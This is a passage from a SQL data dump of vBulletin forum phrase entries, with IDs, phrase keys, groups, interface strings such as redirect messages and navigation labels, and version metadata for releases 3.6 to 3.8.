'frontredirect', 'Your customizations have been saved', 'vbulletin', 'vBulletin Solutions', 1193325882, '3.7.0 Beta 1'), (35494, -1, 'usercss_toggled', 'frontredirect', 'Your preference for viewing user profile style customizations has been switched successfully.', 'vbulletin', 'vBulletin Solutions', 1196438156, '3.7.0 Beta 1'), (35495, -1, 'usergroup_displaygroupupdated', 'frontredirect', 'Your primary display group is now $usergroup[title]', 'vbulletin', '', 0, ''), (35496, -1, 'usergroup_nolongermember', 'frontredirect', 'You are no longer a member of this usergroup.', 'vbulletin', '', 0, ''), (35497, -1, 'usergroup_requested', 'frontredirect', 'Your request to join this usergroup has been logged.', 'vbulletin', '', 0, ''), (35498, -1, 'usergroup_welcome', 'frontredirect', 'Congratulations, you are now a member of the $usergroupname usergroup.', 'vbulletin', '', 0, ''), (35499, -1, 'usernoteaddevent', 'frontredirect', 'Your note regarding $userinfo[username] has been recorded.', 'vbulletin', '', 0, ''), (35500, -1, 'visitormessage_nodelete', 'frontredirect', 'You have chosen to not delete this message. You are now being returned to the user\'s profile.', 'vbulletin', 'vBulletin Solutions', 1191952600, '3.7.0 Beta 1'), (35501, -1, 'visitormessagedelete', 'frontredirect', 'Message has been deleted. You are now being returned to the user\'s profile.', 'vbulletin', 'vBulletin Solutions', 1191952566, '3.7.0 Beta 1'), (35502, -1, 'visitormessageeditthanks', 'frontredirect', 'The comment has been successfully edited. You are now being taken to the comment.', 'vbulletin', 'vBulletin Solutions', 1196724950, '3.7.0 Beta 1'), (35503, -1, 'visitormessagethanks', 'frontredirect', 'Thank you for posting! You will now be taken to your message.', 'vbulletin', 'vBulletin Solutions', 1191952471, '3.7.0 Beta 1'), (35504, -1, '1_day_ago', 'global', '1 Day Ago', 'vbulletin', 'vBulletin Solutions', 1150215451, '3.6.0 Beta 3'), (35505, -1, '1_hour_ago', 'global', '1 Hour Ago', 'vbulletin', '', 0, ''), (35506, -1, '1_minute_ago', 'global', '1 Minute Ago', 'vbulletin', '', 0, ''), (35507, -1, '1_week_ago', 'global', '1 Week Ago', 'vbulletin', '', 0, ''), (35508, -1, 'a_closed_forum', 'global', 'A Closed Forum', 'vbulletin', '', 0, ''), (35509, -1, 'accept', 'global', 'Accept', 'vbulletin', '', 0, ''), (35510, -1, 'action', 'global', 'Action', 'vbulletin', '', 0, ''), (35511, -1, 'active_members', 'global', 'Active Members', 'vbulletin', '', 0, ''), (35512, -1, 'active_subscriptions', 'global', 'Active Subscriptions', 'vbulletin', '', 0, ''), (35513, -1, 'add_new_folders', 'global', 'Add New Folders', 'vbulletin', '', 0, ''), (35514, -1, 'add_subscription', 'global', 'Add Subscription', 'vbulletin', '', 0, ''), (35515, -1, 'add_x_to_contacts', 'global', 'Add {1} to Your Contacts', 'vbulletin', 'vBulletin Solutions', 1196424861, '3.7.0 Beta 1'), (35516, -1, 'admin', 'global', 'Admin', 'vbulletin', '', 0, ''), (35517, -1, 'admin_control_panel', 'global', 'Admin Control Panel', 'vbulletin', '', 0, ''), (35518, -1, 'admin_required_register', 'global', 'The administrator may have required you to register before you can view this page.', 'vbulletin', 'vBulletin Solutions', 1233227208, '3.8.2'), (35519, -1, 'administrator_decided_x_quiet', 'global', 'The administrator has decided that {1} should be quiet for a while.', 'vbulletin', 'vBulletin Solutions', 1210166183, '3.7.1'), (35520, -1, 'administrator_may_disabled_account', 'global', 'If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.', 'vbulletin', '', 0, ''), (35521, -1, 'advanced_search', 'global', 'Advanced Search', 'vbulletin', '', 0, ''), (35522, -1, 'age', 'global', 'Age', 'vbulletin', '', 0, ''), (35523, -1, 'alert_board_off', 'global', 'Alert: The forums are currently turned off!', 'vbulletin', '', 0, ''), (35524, -1, 'all_forums', 'global', 'All Forums', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35525, -1, 'all_times_are_gmt_x_time_now_is_y', 'global', 'All times are GMT{1}. The time now is {2}.', 'vbulletin', '', 0, ''), (35526, -1, 'allow_bbcode', 'global', 'Allow BB Code', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35527, -1, 'allow_html', 'global', 'Allow HTML', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35528, -1, 'allow_img_code', 'global', 'Allow [IMG] Code', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35529, -1, 'allow_smilies', 'global', 'Allow Smilies', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35530, -1, 'announcement', 'global', 'Announcement', 'vbulletin', '', 0, ''), (35531, -1, 'announcements', 'global', 'Announcements', 'vbulletin', '', 0, ''), (35532, -1, 'announcements_in_forum', 'global', 'Announcements in Forum', 'vbulletin', '', 0, ''), (35533, -1, 'april', 'global', 'April', 'vbulletin', '', 0, ''), (35534, -1, 'archive', 'global', 'Archive', 'vbulletin', '', 0, ''), (35535, -1, 'attachment', 'global', 'Attachment', 'vbulletin', '', 0, ''), (35536, -1, 'attachment_statistics', 'global', 'Attachment Statistics', 'vbulletin', '', 0, ''), (35537, -1, 'attachments', 'global', 'Attachments', 'vbulletin', '', 0, ''), (35538, -1, 'august', 'global', 'August', 'vbulletin', '', 0, ''), (35539, -1, 'bb_code_is_x', 'global', 'BB code is {2}', 'vbulletin', 'vBulletin Solutions', 1206964936, '3.7.0 Release Candidate 2'), (35540, -1, 'bbcode_allowed', 'global', 'BB Code Allowed', 'vbulletin', 'vBulletin Solutions', 1203948828, '3.7.0 Beta 6'), (35541, -1, 'bbcode_not_allowed', 'global', 'BB Code is not allowed', 'vbulletin', 'vBulletin Solutions', 1196765570, '3.7.0 Beta 1'), (35542, -1, 'befriend_x', 'global', 'Befriend {1}', 'vbulletin', 'vBulletin Solutions', 1195037435, '3.7.0 Beta 1'), (35543, -1, 'by_x', 'global', 'by {2}', 'vbulletin', '', 0, ''), (35544, -1, 'bytes', 'global', 'Bytes', 'vbulletin', '', 0, ''), (35545, -1, 'calendar', 'global', 'Calendar', 'vbulletin', '', 0, ''), (35546, -1, 'can_moderate_user_signatures', 'global', 'Can Moderate User Signatures', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35547, -1, 'cancel', 'global', 'Cancel', 'vbulletin', '', 0, ''), (35548, -1, 'cancel_changes', 'global', 'Cancel Changes', 'vbulletin', 'vBulletin Solutions', 1218195940, '3.8.0 Alpha 1'), (35549, -1, 'cant_identify_image', 'global', 'Can\'t identify the image? Click it to get a new one.', 'vbulletin', 'vBulletin Solutions', 1150305216, '3.6.0 Beta 3'), (35550, -1, 'caps_lock_is_on', 'global', 'Caps Lock is on!
\r\n
\r\nHaving Caps Lock on may cause you to enter your password incorrectly. You should press Caps Lock to turn it off before entering your password.', 'vbulletin', 'vBulletin Solutions', 1155827057, '3.6.1'), (35551, -1, 'check_uncheck_all', 'global', 'Check / Uncheck All', 'vbulletin', '', 0, ''), (35552, -1, 'check_vulnerable_passwords', 'global', 'Check Vulnerable Passwords', 'vbulletin', 'vBulletin Solutions', 1219226217, '3.8.0 Alpha 1'), (35553, -1, 'click_a_smilie_to_insert_it_into_your_message', 'global', 'Click a smilie to insert it into your message.', 'vbulletin', '', 0, ''), (35554, -1, 'click_here_to_log_in', 'global', 'Click here to log in', 'vbulletin', '', 0, ''), (35555, -1, 'click_if_browser_does_not_redirect', 'global', 'Click here if your browser does not automatically redirect you.', 'vbulletin', '', 0, ''), (35556, -1, 'click_the_following_button', 'global', 'Click the following button to proceed.', 'vbulletin', 'vBulletin Solutions', 1144350180, '3.6.0 Beta 1'), (35557, -1, 'close_this_window', 'global', 'Close this window', 'vbulletin', '', 0, ''), (35558, -1, 'closed_thread', 'global', 'Closed Thread', 'vbulletin', '', 0, ''), (35559, -1, 'code', 'global', 'Code', 'vbulletin', '', 0, ''), (35560, -1, 'community', 'global', 'Community', 'vbulletin', 'vBulletin Solutions', 1218542172, '3.8.0 Alpha 1'), (35561, -1, 'community_links', 'global', 'Community Links', 'vbulletin', 'vBulletin Solutions', 1218546048, '3.8.0 Alpha 1'), (35562, -1, 'contact', 'global', 'Contact', 'vbulletin', '', 0, ''), (35563, -1, 'contact_us', 'global', 'Contact Us', 'vbulletin', '', 0, ''), (35564, -1, 'contacts', 'global', 'Contacts', 'vbulletin', 'vBulletin Solutions', 1196427469, '3.7.0 Beta 1'), (35565, -1, 'contacts_and_friends', 'global', 'Contacts & Friends', 'vbulletin', 'vBulletin Solutions', 1196427317, '3.7.0 Beta 1'), (35566, -1, 'contains_new_posts', 'global', 'Contains New Posts', 'vbulletin', '', 0, ''), (35567, -1, 'contains_no_new_posts', 'global', 'Contains No New Posts', 'vbulletin', '', 0, ''), (35568, -1, 'current_attachment_total_x', 'global', 'Current Attachment Total: {1}', 'vbulletin', '', 0, ''), (35569, -1, 'current_attachments', 'global', 'Current Attachments', 'vbulletin', '', 0, ''), (35570, -1, 'currently_active_users', 'global', 'Currently Active Users', 'vbulletin', '', 0, ''), (35571, -1, 'custom_fields', 'global', 'Custom Fields', 'vbulletin', '', 0, ''), (35572, -1, 'daily', 'global', 'Daily', 'vbulletin', '', 0, ''), (35573, -1, 'daily_email_notification', 'global', 'Daily email notification', 'vbulletin', '', 0, ''), (35574, -1, 'daily_updates_by_email', 'global', 'Daily updates by email', 'vbulletin', '', 0, ''), (35575, -1, 'date', 'global', 'Date', 'vbulletin', '', 0, ''), (35576, -1, 'day', 'global', 'Day', 'vbulletin', '', 0, ''), (35577, -1, 'days', 'global', 'Days', 'vbulletin', '', 0, ''), (35578, -1, 'december', 'global', 'December', 'vbulletin', '', 0, ''), (35579, -1, 'decrease_size', 'global', 'Decrease Size', 'vbulletin', '', 0, ''), (35580, -1, 'default', 'global', 'Default', 'vbulletin', '', 0, ''), (35581, -1, 'delete', 'global', 'Delete', 'vbulletin', '', 0, ''), (35582, -1, 'delete_posts', 'global', 'Delete Posts', 'vbulletin', '', 0, ''), (35583, -1, 'delete_selected', 'global', 'Delete Selected', 'vbulletin', '', 0, ''), (35584, -1, 'delete_subscription', 'global', 'Delete Subscription', 'vbulletin', '', 0, ''), (35585, -1, 'delete_thread', 'global', 'Delete Thread', 'vbulletin', '', 0, ''), (35586, -1, 'delete_user_note', 'global', 'Delete User Note', 'vbulletin', '', 0, ''), (35587, -1, 'deny', 'global', 'Deny', 'vbulletin', '', 0, ''), (35588, -1, 'destination_forum', 'global', 'Destination Forum', 'vbulletin', '', 0, ''), (35589, -1, 'disabled', 'global', 'Disabled', 'vbulletin', 'vBulletin Solutions', 1192488949, '3.7.0 Beta 1'), (35590, -1, 'discussion_by_x_for_y_undeleted', 'global', 'Discussion by {1} for \'{2}\' Undeleted', 'vbulletin', 'vBulletin Solutions', 1222079939, '3.8.0 Alpha 2'), (35591, -1, 'discussion_thread_created_x_y', 'global', 'A discussion thread has been created at {1}/showthread.php?t={2}', 'vbulletin', 'vBulletin Solutions', 1196372524, '3.7.0 Beta 1'), (35592, -1, 'dismiss', 'global', 'Dismiss', 'vbulletin', 'vBulletin Solutions', 1218633405, '3.8.0 Alpha 1'), (35593, -1, 'display_options', 'global', 'Display Options', 'vbulletin', '', 0, ''), (35594, -1, 'do_authorizations', 'global', 'Do Authorizations', 'vbulletin', '', 0, ''), (35595, -1, 'done', 'global', 'Done', 'vbulletin', '', 0, ''), (35596, -1, 'doubleclick_forum_markread', 'global', 'Double-click this icon to mark this forum and its contents as read', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35597, -1, 'edit', 'global', 'Edit', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35598, -1, 'edit_avatar', 'global', 'Edit Avatar', 'vbulletin', '', 0, ''), (35599, -1, 'edit_folders', 'global', 'Edit Folders', 'vbulletin', '', 0, ''), (35600, -1, 'edit_options', 'global', 'Edit Options', 'vbulletin', '', 0, ''), (35601, -1, 'edit_permissions', 'global', 'Edit Permissions', 'vbulletin', 'vBulletin Solutions', 1213891590, '3.8.0 Alpha 1'), (35602, -1, 'edit_poll', 'global', 'Edit Poll', 'vbulletin', '', 0, ''), (35603, -1, 'edit_post', 'global', 'Edit Post', 'vbulletin', '', 0, ''), (35604, -1, 'edit_profile_picture', 'global', 'Edit Profile Picture', 'vbulletin', '', 0, ''), (35605, -1, 'edit_signature', 'global', 'Edit Signature', 'vbulletin', '', 0, ''), (35606, -1, 'edit_thread', 'global', 'Edit Thread', 'vbulletin', '', 0, ''), (35607, -1, 'edit_user_note', 'global', 'Edit User Note', 'vbulletin', '', 0, ''), (35608, -1, 'edit_your_details', 'global', 'Edit Your Details', 'vbulletin', 'vBulletin Solutions', 1197902885, '3.7.0 Beta 2'), (35609, -1, 'email', 'global', 'Email', 'vbulletin', '', 0, ''), (35610, -1, 'email_address', 'global', 'Email Address', 'vbulletin', '', 0, ''), (35611, -1, 'emailing', 'global', 'Emailing', 'vbulletin', '', 0, ''), (35612, -1, 'end_date', 'global', 'End Date', 'vbulletin', 'vBulletin Solutions', 1149257916, '3.6.0 Beta 1'), (35613, -1, 'enter_password_for_account', 'global', 'Please enter a password for your user account. Note that passwords are case-sensitive.', 'vbulletin', '', 0, ''), (35614, -1, 'enter_username_to_login_or_register', 'global', 'Enter your username and password in the boxes provided to login, or click the \'register\' button to create a profile for yourself.', 'vbulletin', '', 0, ''), (35615, -1, 'errors', 'global', 'Errors', 'vbulletin', 'vBulletin Solutions', 1190904785, '3.7.0 Beta 1'), (35616, -1, 'errors_occured_when_submitted', 'global', 'The following errors occurred with your submission', 'vbulletin', 'vBulletin Solutions', 1191936212, '3.7.0 Beta 1'), (35617, -1, 'event', 'global', 'Event', 'vbulletin', '', 0, ''), (35618, -1, 'event_reminders', 'global', 'Event Reminders', 'vbulletin', '', 0, ''), (35619, -1, 'export', 'global', 'Export', 'vbulletin', '', 0, ''), (35620, -1, 'faq', 'global', 'FAQ', 'vbulletin', '', 0, ''), (35621, -1, 'february', 'global', 'February', 'vbulletin', '', 0, ''), (35622, -1, 'find_all_posts_by_x', 'global', 'Find all posts by {1}', 'vbulletin', '', 0, ''), (35623, -1, 'find_posts_by_user', 'global', 'Find Posts by User', 'vbulletin', '', 0, ''), (35624, -1, 'first', 'global', 'First', 'vbulletin', '', 0, ''), (35625, -1, 'first_page', 'global', 'First Page', 'vbulletin', '', 0, ''), (35626, -1, 'first_picture_short', 'global', 'First', 'vbulletin', 'vBulletin Solutions', 1247671616, '3.8.3'), (35627, -1, 'first_visit_message', 'global', 'If this is your first visit, be sure to check out the FAQ by clicking the link above.\r\nYou may have to register before you can post: click the register link above to proceed.\r\nTo start viewing messages, select the forum that you want to visit from the selection below.', 'vbulletin', 'vBulletin Solutions', 1233227197, '3.8.2'), (35628, -1, 'folder', 'global', 'Folder', 'vbulletin', '', 0, ''), (35629, -1, 'folder_controls', 'global', 'Folder Controls', 'vbulletin', '', 0, ''), (35630, -1, 'folder_is_currently_empty', 'global', 'This folder is currently empty.', 'vbulletin', '', 0, ''), (35631, -1, 'folder_name', 'global', 'Folder Name', 'vbulletin', '', 0, ''), (35632, -1, 'folders', 'global', 'Folders', 'vbulletin', '', 0, ''), (35633, -1, 'forgotten_password_request_email', 'global', 'If you have forgotten your username or password, you can request to have your username emailed to you and to reset your password. When you fill in your registered email address, you will be sent instructions on how to reset your password.', 'vbulletin', '', 0, ''), (35634, -1, 'forgotten_your_password', 'global', 'Forgotten Your Password?', 'vbulletin', '', 0, ''), (35635, -1, 'forum', 'global', 'Forum', 'vbulletin', '', 0, ''), (35636, -1, 'forum_contains_new_posts', 'global', 'Forum Contains New Posts', 'vbulletin', '', 0, ''), (35637, -1, 'forum_contains_no_new_posts', 'global', 'Forum Contains No New Posts', 'vbulletin', '', 0, ''), (35638, -1, 'forum_is_closed_for_posting', 'global', 'Forum is Closed for Posting', 'vbulletin', '', 0, ''), (35639, -1, 'forum_jump', 'global', 'Forum Jump', 'vbulletin', '', 0, ''), (35640, -1, 'forum_rules_link', 'global', 'Forum Rules', 'vbulletin', 'vBulletin Solutions', 1220350190, '3.8.0 Alpha 1'), (35641, -1, 'forums', 'global', 'Forums', 'vbulletin', '', 0, ''), (35642, -1, 'forums_home', 'global', 'Forums Home', 'vbulletin', '', 0, ''), (35643, -1, 'friday', 'global', 'Friday', 'vbulletin', '', 0, ''), (35644, -1, 'friend', 'global', 'Friend', 'vbulletin', 'vBulletin Solutions', 1195753900, '3.7.0 Beta 1'), (35645, -1, 'gigabytes', 'global', 'GB', 'vbulletin', '', 0, ''), (35646, -1, 'global_announcement', 'global', 'Global Announcement', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35647, -1, 'go', 'global', 'Go', 'vbulletin', '', 0, ''), (35648, -1, 'go_back', 'global', 'Go Back', 'vbulletin', '', 0, ''), (35649, -1, 'go_first_unread_in_thread_x', 'global', 'Go to first unread post in thread \'{1}\'', 'vbulletin', '', 0, ''), (35650, -1, 'go_to_first_new_post', 'global', 'Go to first new post', 'vbulletin', '', 0, ''), (35651, -1, 'go_to_last_post', 'global', 'Go to last post', 'vbulletin', '', 0, ''), (35652, -1, 'go_to_page', 'global', 'Go to Page...', 'vbulletin', '', 0, ''), (35653, -1, 'go_x', 'global', 'Go ({1})', 'vbulletin', '', 0, ''), (35654, -1, 'group_messages_awaiting_approval', 'global', 'Unapproved Group Messages', 'vbulletin', 'vBulletin Solutions', 1212410901, '3.8.0 Alpha 1'), (35655, -1, 'guest', 'global', 'Guest', 'vbulletin', '', 0, ''), (35656, -1, 'have_new_pm_popup_x_y', 'global', 'You have a new private message.\\n\\nSender: {1}\\nTitle: \'{2}\'\\n\\nClick OK to view it, or cancel to hide this prompt.', 'vbulletin', 'vBulletin Solutions', 1202140573, '3.7.0 Beta 5'), (35657, -1, 'have_x_posts_in_thread_last_y', 'global', 'You have {1} post(s) in this thread, last {2}', 'vbulletin', '', 0, ''), (35658, -1, 'hide_thumbnails', 'global', 'Hide Thumbnails', 'vbulletin', '', 0, ''), (35659, -1, 'hours', 'global', 'Hours', 'vbulletin', 'vBulletin Solutions', 1155836709, '3.6.1'), (35660, -1, 'html_code', 'global', 'HTML Code', 'vbulletin', '', 0, ''), (35661, -1, 'html_code_is_x', 'global', 'HTML code is {1}', 'vbulletin', '', 0, ''), (35662, -1, 'hybrid', 'global', 'Hybrid', 'vbulletin', '', 0, ''), (35663, -1, 'ignore', 'global', 'Ignore', 'vbulletin', '', 0, ''), (35664, -1, 'image_verification', 'global', 'Image Verification', 'vbulletin', 'vBulletin Solutions', 1144957466, '3.6.0 Beta 1'), (35665, -1, 'img_code_is_x', 'global', '[IMG] code is {2}', 'vbulletin', '', 0, ''), (35666, -1, 'in_progress', 'global', 'In Progress', 'vbulletin', '', 0, ''), (35667, -1, 'inbox', 'global', 'Inbox', 'vbulletin', '', 0, ''), (35668, -1, 'incoming_friend_requests', 'global', 'Incoming Friend Requests', 'vbulletin', 'vBulletin Solutions', 1197374250, '3.7.0 Beta 1'), (35669, -1, 'increase_size', 'global', 'Increase Size', 'vbulletin', '', 0, ''), (35670, -1, 'info', 'global', 'Info', 'vbulletin', '', 0, ''), (35671, -1, 'infractions', 'global', 'Infractions', 'vbulletin', 'vBulletin Solutions', 1150416261, '3.6.0 Beta 3'), (35672, -1, 'instant_email_notification', 'global', 'Instant email notification', 'vbulletin', '', 0, ''), (35673, -1, 'instant_messaging', 'global', 'Instant Messaging', 'vbulletin', '', 0, ''), (35674, -1, 'instant_notification_by_email', 'global', 'Instant notification by email', 'vbulletin', '', 0, ''), (35675, -1, 'invitations_to_join_social_groups', 'global', 'Social Group Invitations', 'vbulletin', 'vBulletin Solutions', 1212410927, '3.8.0 Alpha 1'), (35676, -1, 'ip_address', 'global', 'IP Address', 'vbulletin', '', 0, ''), (35677, -1, 'january', 'global', 'January', 'vbulletin', '', 0, ''), (35678, -1, 'join_date', 'global', 'Join Date', 'vbulletin', '', 0, ''), (35679, -1, 'join_request', 'global', 'Join Request', 'vbulletin', '', 0, ''), (35680, -1, 'join_requests', 'global', 'Join Requests', 'vbulletin', '', 0, ''), (35681, -1, 'july', 'global', 'July', 'vbulletin', '', 0, ''), (35682, -1, 'jump_to_folder', 'global', 'Jump to Folder', 'vbulletin', '', 0, ''), (35683, -1, 'june', 'global', 'June', 'vbulletin', '', 0, ''), (35684, -1, 'kilobytes', 'global', 'KB', 'vbulletin', '', 0, ''), (35685, -1, 'last', 'global', 'Last', 'vbulletin', '', 0, ''), (35686, -1, 'last_activity', 'global', 'Last Activity', 'vbulletin', '', 0, ''), (35687, -1, 'last_online', 'global', 'Last Online', 'vbulletin', '', 0, ''), (35688, -1, 'last_page', 'global', 'Last Page', 'vbulletin', '', 0, ''), (35689, -1, 'last_picture_short', 'global', 'Last', 'vbulletin', 'vBulletin Solutions', 1247671956, '3.8.3'), (35690, -1, 'last_post', 'global', 'Last Post', 'vbulletin', '', 0, ''), (35691, -1, 'last_visited_x_at_y', 'global', 'You last visited: {1} at {2}', 'vbulletin', '', 0, ''), (35692, -1, 'lightbox_first', 'global', 'First', 'vbulletin', 'vBulletin Solutions', 1247671588, '3.8.3'), (35693, -1, 'lightbox_last', 'global', 'Last', 'vbulletin', 'vBulletin Solutions', 1247671934, '3.8.3'), (35694, -1, 'lightbox_next', 'global', 'Next', 'vbulletin', 'vBulletin Solutions', 1247672196, '3.8.3'), (35695, -1, 'lightbox_previous', 'global', 'Previous', 'vbulletin', 'vBulletin Solutions', 1247672569, '3.8.3'), (35696, -1, 'list_messages', 'global', 'List Messages', 'vbulletin', '', 0, ''), (35697, -1, 'list_subscriptions', 'global', 'List Subscriptions', 'vbulletin', '', 0, ''), (35698, -1, 'location_perm', 'global', 'Location', 'vbulletin', '', 0, ''), (35699, -1, 'log_in', 'global', 'Log in', 'vbulletin', '', 0, ''), (35700, -1, 'log_out', 'global', 'Log Out', 'vbulletin', '', 0, ''), (35701, -1, 'log_out_x', 'global', 'Log Out {1}', 'vbulletin', '', 0, ''), (35702, -1, 'logged_in_as_x', 'global', 'Logged in as {2}', 'vbulletin', '', 0, ''), (35703, -1, 'lost_password_recovery_form', 'global', 'Lost Password Recovery Form', 'vbulletin', '', 0, ''), (35704, -1, 'manage', 'global', 'Manage', 'vbulletin', '', 0, ''), (35705, -1, 'manage_attachments', 'global', 'Manage Attachments', 'vbulletin', '', 0, ''), (35706, -1, 'march', 'global', 'March', 'vbulletin', '', 0, ''), (35707, -1, 'mark_forums_read', 'global', 'Mark Forums Read', 'vbulletin', '', 0, ''), (35708, -1, 'mark_this_discussion_read', 'global', 'Mark This Discussion Read', 'vbulletin', 'vBulletin Solutions', 1213633526, '3.7.1'), (35709, -1, 'mark_this_group_read', 'global', 'Mark This Group Read', 'vbulletin', 'vBulletin Solutions', 1213615172, '3.7.1'), (35710, -1, 'maximum_allowed_messages_x', 'global', 'Maximum allowed stored messages: {1}', 'vbulletin', '', 0, ''), (35711, -1, 'maximum_attachment_storage_x', 'global', 'Maximum Attachment Storage: {1}', 'vbulletin', '', 0, ''), (35712, -1, 'may', 'global', 'May', 'vbulletin', '', 0, ''), (35713, -1, 'may_choose_icon_for_message', 'global', 'You may choose an icon for your message from the following list', 'vbulletin', '', 0, ''), (35714, -1, 'may_not_have_sufficient_privileges', 'global', 'You may not have sufficient privileges to access this page. Are you trying to edit someone else\'s post, access administrative features or some other privileged system?', 'vbulletin', '', 0, ''), (35715, -1, 'megabytes', 'global', 'MB', 'vbulletin', '', 0, ''), (35716, -1, 'members', 'global', 'Members', 'vbulletin', '', 0, ''), (35717, -1, 'members_list', 'global', 'Members List', 'vbulletin', '', 0, ''), (35718, -1, 'members_picture_albums', 'global', 'Member\'s Picture Albums', 'vbulletin', 'vBulletin Solutions', 1216916667, '3.8.0 Alpha 1'), (35719, -1, 'message', 'global', 'Message', 'vbulletin', '', 0, ''), (35720, -1, 'message_deleted_by_x', 'global', 'This message has been deleted by {2}.', 'vbulletin', 'vBulletin Solutions', 1144777399, '3.6.0 Beta 1'), (35721, -1, 'message_hidden_x_on_ignore_list', 'global', 'This message is hidden because {1} is on your ignore list.', 'vbulletin', 'vBulletin Solutions', 1202913478, '3.7.0 Beta 5'), (35722, -1, 'messages', 'global', 'Messages', 'vbulletin', '', 0, ''), (35723, -1, 'miscellaneous', 'global', 'Miscellaneous', 'vbulletin', '', 0, ''), (35724, -1, 'miscellaneous_options', 'global', 'Miscellaneous Options', 'vbulletin', '', 0, ''), (35725, -1, 'mod', 'global', 'Mod', 'vbulletin', '', 0, ''), (35726, -1, 'moderator', 'global', 'Moderator', 'vbulletin', '', 0, ''), (35727, -1, 'moderator_control_panel', 'global', 'Moderator Control Panel', 'vbulletin', '', 0, ''), (35728, -1, 'moderators', 'global', 'Moderators', 'vbulletin', '', 0, ''), (35729, -1, 'monday', 'global', 'Monday', 'vbulletin', '', 0, ''), (35730, -1, 'month', 'global', 'Month', 'vbulletin', '', 0, ''), (35731, -1, 'monthly', 'global', 'Monthly', 'vbulletin', '', 0, ''), (35732, -1, 'months', 'global', 'Months', 'vbulletin', '', 0, ''), (35733, -1, 'more_than_x_replies_or_y_views', 'global', 'More than {1} replies or {2} views', 'vbulletin', '', 0, ''), (35734, -1, 'most_users_ever_online_was_x_y_at_z', 'global', 'Most users ever online was {1}, {2} at {3}.', 'vbulletin', '', 0, ''), (35735, -1, 'move_delete_subscriptions', 'global', 'Move / Delete Subscriptions', 'vbulletin', '', 0, ''), (35736, -1, 'move_items', 'global', 'Move Items', 'vbulletin', '', 0, ''), (35737, -1, 'move_subscribed_threads', 'global', 'Move Subscribed Threads', 'vbulletin', '', 0, ''), (35738, -1, 'move_to_folder', 'global', 'Move to folder', 'vbulletin', '', 0, ''), (35739, -1, 'move_x_items_from_y', 'global', 'Move {1} items from \'{2}\'', 'vbulletin', '', 0, ''), (35740, -1, 'moved_thread_prefix', 'global', 'Moved: ', 'vbulletin', '', 0, ''), (35741, -1, 'multipage_thread', 'global', 'Multi-page thread', 'vbulletin', '', 0, ''), (35742, -1, 'multiple_choice_poll', 'global', 'Multiple Choice Poll.', 'vbulletin', '', 0, ''), (35743, -1, 'n_a', 'global', 'N/A', 'vbulletin', '', 0, ''), (35744, -1, 'networking', 'global', 'Networking', 'vbulletin', 'vBulletin Solutions', 1201009850, '3.7.0 Beta 5'), (35745, -1, 'never', 'global', 'Never', 'vbulletin', '', 0, ''), (35747, -1, 'new_posts', 'global', 'New posts', 'vbulletin', 'vBulletin Solutions', 1216989273, '3.8.0 Alpha 1'), (35748, -1, 'new_posts_nav', 'global', 'New Posts', 'vbulletin', 'vBulletin Solutions', 1216989282, '3.8.0 Alpha 1'), (35749, -1, 'new_user_note', 'global', 'New User Note', 'vbulletin', '', 0, ''), (35750, -1, 'next', 'global', 'Next', 'vbulletin', '', 0, ''), (35751, -1, 'next_page', 'global', 'Next Page', 'vbulletin', '', 0, ''), (35752, -1, 'next_picture_short', 'global', 'Next', 'vbulletin', 'vBulletin Solutions', 1265284692, '3.8.5'), (35753, -1, 'no', 'global', 'No', 'vbulletin', '', 0, ''), (35754, -1, 'no_email_notification', 'global', 'No email notification', 'vbulletin', '', 0, ''), (35755, -1, 'no_icon', 'global', 'No icon', 'vbulletin', '', 0, ''), (35756, -1, 'no_new_posts', 'global', 'No new posts', 'vbulletin', '', 0, ''), (35757, -1, 'no_signatures_awaiting_moderation', 'global', 'No Signatures Awaiting Moderation', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35758, -1, 'no_users_selected', 'global', 'No users selected!', 'vbulletin', '', 0, ''), (35759, -1, 'none', 'global', 'None', 'vbulletin', '', 0, ''), (35760, -1, 'not', 'global', 'not', 'vbulletin', '', 0, ''), (35761, -1, 'not_logged_in_fill_in_form', 'global', 'You are not logged in. Fill in the form at the bottom of this page and try again.', 'vbulletin', '', 0, ''), (35762, -1, 'not_logged_no_permission', 'global', 'You are not logged in or you do not have permission to access this page. This could be due to one of several reasons:', 'vbulletin', '', 0, ''), (35763, -1, 'notices', 'global', 'Notices', 'vbulletin', 'vBulletin Solutions', 1189781133, '3.6.8'), (35764, -1, 'notification', 'global', 'Notification', 'vbulletin', '', 0, ''), (35765, -1, 'notification_type', 'global', 'Notification Type', 'vbulletin', '', 0, ''), (35766, -1, 'november', 'global', 'November', 'vbulletin', '', 0, ''), (35767, -1, 'number_of_replies', 'global', 'Number of Replies', 'vbulletin', '', 0, ''), (35768, -1, 'number_of_views', 'global', 'Number of Views', 'vbulletin', '', 0, ''), (35769, -1, 'numeric_value', 'global', '{1}', 'vbulletin', 'vBulletin Solutions', 1211880882, '3.7.1'), (35770, -1, 'numeric_value_emphasized', 'global', '{1}', 'vbulletin', 'vBulletin Solutions', 1211880898, '3.7.1'), (35771, -1, 'october', 'global', 'October', 'vbulletin', '', 0, ''), (35772, -1, 'off', 'global', 'Off', 'vbulletin', '', 0, ''), (35773, -1, 'offline', 'global', 'Offline', 'vbulletin', '', 0, ''), (35774, -1, 'okay', 'global', 'Okay', 'vbulletin', '', 0, ''), (35775, -1, 'old', 'global', 'Old', 'vbulletin', '', 0, ''), (35776, -1, 'older', 'global', 'Older', 'vbulletin', 'vBulletin Solutions', 1152610994, '3.6.0 Release Candidate 2'), (35777, -1, 'on', 'global', 'On', 'vbulletin', '', 0, ''), (35778, -1, 'online', 'global', 'Online', 'vbulletin', '', 0, ''), (35779, -1, 'only_used_to_report', 'global', 'Note: This is ONLY to be used to report spam, advertising messages, and problematic (harassment, fighting, or rude) posts.', 'vbulletin', 'vBulletin Solutions', 1203421356, '3.7.0 Beta 6'), (35780, -1, 'open_contacts', 'global', 'Open Contacts Popup', 'vbulletin', 